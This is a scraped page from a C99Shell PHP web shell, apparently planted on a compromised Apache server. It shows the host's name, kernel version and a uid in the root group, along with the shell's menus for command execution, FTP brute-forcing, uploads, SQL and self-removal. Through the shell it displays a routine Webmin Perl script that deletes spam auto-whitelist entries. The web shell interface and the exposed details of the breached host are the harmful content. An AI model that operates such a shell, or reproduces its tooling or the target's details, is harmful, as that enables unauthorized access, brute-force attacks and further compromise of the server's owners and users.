!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/spam/   drwxr-xr-x
Free 28.62 GB of 117.98 GB (24.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     deleteall_awl.cgi (806 B)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Delete all auto-whitelist entries for all users

require './spam-lib.pl';
&error_setup($text{'dawl_err'});
&ReadParse();
&set_config_file_in(\%in);
&can_use_check("awl");
&ReadParse();

&ui_print_unbuffered_header(undef, $text{'dawl_title'}, "");

# Do all users
print $text{'dawl_doing'},"<br>\n";
$count = $ucount = 0;
setpwent();
while($u = getpwent()) {
    push(@users, $u);
    }
endpwent();
foreach $u (@users) {
    next if (!&can_edit_awl($u));
    print "doing $u<br>\n";
    &eval_as_unix_user($u->[0],
        sub
        {
        &open_auto_whitelist_dbm($u) || next;
        foreach $k (keys %awl) {
            delete($awl{$k});
            $count++;
            }
        &close_auto_whitelist_dbm();
        });
    $ucount++;
    }
endpwent();
print &text('dawl_done', $ucount, $count),"<p>\n";

&ui_print_footer($redirect_url, $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--